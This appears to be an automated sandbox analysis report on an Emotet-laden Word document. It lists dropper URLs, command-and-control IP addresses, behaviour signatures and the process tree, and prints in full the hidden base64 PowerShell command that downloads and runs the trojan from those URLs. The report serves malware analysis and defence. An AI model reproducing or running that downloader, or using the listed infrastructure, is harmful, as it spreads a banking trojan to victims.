Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    139s
  • resource
    win7v191014
  • submitted
    20-12-2019 03:54

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_8a1b1714e1ae0fabcf590df96af964ab.10

  • Sample

    191220-bnnwdw1e6a

  • SHA256

    e8f4adbc33575dfdc6cc8046ec0478baee34237bda285c3e9fd4798aea4ea516

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://fanitv.com/sandbox/oQmLZD/
exe.dropper

http://bicheru-cycling.ro/bbr/IEScmzh/
exe.dropper

http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/
exe.dropper

https://4vetcbd.com/cgi-bin/CqCjQxYqx/
exe.dropper

http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/

Extracted

Family

emotet

C2

98.178.241.106:80

190.171.153.139:80

179.5.118.12:8080

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

67.254.196.78:443

95.216.207.86:7080

181.46.176.38:80

98.15.140.226:80

217.12.70.226:80

115.179.91.58:80

41.190.148.90:80

162.144.46.90:8080

211.218.105.101:80

212.129.14.27:8080

120.51.83.89:443

200.41.121.69:443
rsa_pubkey.plain

Signatures

  • Drops file in System32 directory 6 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies registry class 144 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8a1b1714e1ae0fabcf590df96af964ab.10.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1068
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000598;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1120
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000598;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2000
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHYAYQB1AG4AcQBiAHgAYgBwAHkAYQB5AD0AJwBUAGcAbQBqAHcAbQBwAGgAdAByAHYAJwA7ACQASABlAHQAZQB6AG4AZQBjAHcAbwBrAGMAIAA9ACAAJwA2ADYAMgAnADsAJABPAGYAbAB4AGIAdAByAG4AcgBmAGcAcwA9ACcARABmAHkAcABiAG8AZABpACcAOwAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGUAdABlAHoAbgBlAGMAdwBvAGsAYwArACcALgBlAHgAZQAnADsAJABRAGoAcQBuAGgAZAByAHoAbgBmAG0AawA9ACcAWABpAHcAZgBvAGcAZABkACcAOwAkAEcAYwBmAGkAcQBqAGMAcABhAHcAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAOwAkAFcAbAByAG0AZgBmAG0AawB2AGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBmAGEAbgBpAHQAdgAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvAG8AUQBtAEwAWgBEAC8AKgBoAHQAdABwADoALwAvAGIAaQBjAGgAZQByAHUALQBjAHkAYwBsAGkAbgBnAC4AcgBvAC8AYgBiAHIALwBJAEUAUwBjAG0AegBoAC8AKgBoAHQAdABwADoALwAvAGwAZQBzAGQAZQBiAGEAdABzAGQAZQBjAG8AdQB6AG8AbgAuAG8AcgBnAC8AbABkAGQAYwAvADcAdwBwAGUAMgAtAGsAYwBrAGIAegA0AHoAYQAtADIANQA1ADYAOAAvACoAaAB0AHQAcABzADoALwAvADQAdgBlAHQAYwBiAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBDAHEAQwBqAFEAeABZAHEAeAAvACoAaAB0AHQAcAA6AC8ALwB6AGwAYQB0AGUAYgBlAG4AegAuAG0AawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AG4AbABrAHoANgB5AC0AbABtAGYAawAtADkAMQAzADYAMgA5ADYANwAyADEALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQARQBuAHMAZwBwAHoAbwBnAGgAdABoAD0AJwBEAGcAbwBvAGgAZgBlAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAZgBnAHEAdAB1AGIAeABxACAAaQBuACAAJABXAGwAcgBtAGYAZgBtAGsAdgBjACkAewB0AHIAeQB7ACQARwBjAGYAaQBxAGoAYwBwAGEAdwAuACIAZABPAHcAbgBsAG8AYQBgAGQAZgBgAGkAbABFACIAKAAkAFQAZgBnAHEAdAB1AGIAeABxACwAIAAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0ACkAOwAkAFcAcgB0AHMAeAB0AHEAcABtAGcAZABqAD0AJwBMAGoAbwByAGcAYwB0AHYAZgBmACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQAuACIATABFAE4AYABHAFQASAAiACAALQBnAGUAIAAzADQAMwA1ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAFQAIgAoACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQA7ACQAUwB2AHgAeQB4AGsAdQB3AD0AJwBHAHEAbgBxAGUAdQBsAHoAdQBsAGQAYwB4ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQB6AGIAbQBvAHoAeQB0AHkAdAA9ACcARwB5AHoAbwB3AG4AaABhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB0AGYAeABuAHcAcQB4AGcAbABvAD0AJwBWAGIAaABoAHMAdABzAGsAZgBkAHQAdwAnAA==
    1⤵
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Users\Admin\662.exe
      "C:\Users\Admin\662.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:1372
      • C:\Users\Admin\662.exe
        --2a4aec10
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        PID:888
  • C:\Windows\SysWOW64\monthlyraw.exe
    "C:\Windows\SysWOW64\monthlyraw.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:1804
    • C:\Windows\SysWOW64\monthlyraw.exe
      --d8bcc9ed
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: EmotetMutantsSpam
      • Executes dropped EXE
      PID:1580

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/888-14-0x00000000002F0000-0x0000000000307000-memory.dmp

    Filesize

    92KB

    Download

  • memory/888-15-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1068-4-0x000000000A4A0000-0x000000000A4A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1068-3-0x0000000009420000-0x0000000009424000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-2-0x0000000006160000-0x0000000006164000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-1-0x0000000006160000-0x0000000006164000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1068-0-0x0000000005F30000-0x0000000005F34000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1372-10-0x00000000003E0000-0x00000000003F7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1580-19-0x00000000003D0000-0x00000000003E7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1580-20-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1804-17-0x00000000002A0000-0x00000000002B7000-memory.dmp

    Filesize

    92KB

    Download